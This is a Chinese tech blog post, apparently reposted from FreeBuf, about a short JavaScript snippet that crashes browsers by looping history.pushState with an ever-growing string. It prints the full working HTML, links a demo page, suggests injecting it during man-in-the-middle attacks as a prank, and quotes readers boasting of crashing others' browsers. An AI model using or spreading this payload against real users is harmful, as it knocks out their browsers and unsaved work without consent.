深夜话题:这十二行代码是如何让浏览器爆炸的?
起因
今天刷推特的时候发现Cyber Security @cyber__sec 的推文让人眼前一亮:
Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit //使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。
继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:
Crash your friend's browser and restart Iphone with a link which has this script: #0day //把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让Iphone重启。
完整HTML代码如下:
<html> <body> <script> var total=""; for (var i=0;i<1000000;i++) { total= total+i.toString(); history.pushState(0,0,total); } </script> </body> </html> demo: (温馨提示:请保存浏览器其它窗口的编辑任务)
www.0xroot.cn/demo.html (点击一下,又不会怀孕!)
接来下会发生什么?
点开以后,我的状态是这样的:
如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!
如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。 至于在推文中提到的让iPhone重启,这一现象倒是没有出现。
思考
这是Bug还是0day?为什么会有这一现象?如何实现的?
有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)
欢迎大家在评论中发表自己的观点 
微博评论/讨论摘取
怀孕了... 好有趣... 好可怕... 整蛊不错 我已祸害了好多人(卖萌脸(づ ̄ 3 ̄)づ) 崩溃了 火狐假死10秒后弹窗提示脚本无响应可停止难道是history的栈溢出么? 可以可以,新姿势get√ JS是世界上最好的语言! hist.pushState是干嘛用的? 电脑正在重启 不能只让我一个人中招 我为什么会手贱? Chrome隐身模式没有问题啊
*作者/雪碧,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)
正文到此结束
热门推荐
相关文章
Loading...
![[HBLOG]公众号](http://www.liuhaihua.cn/img/qrcode_gzh.jpg)
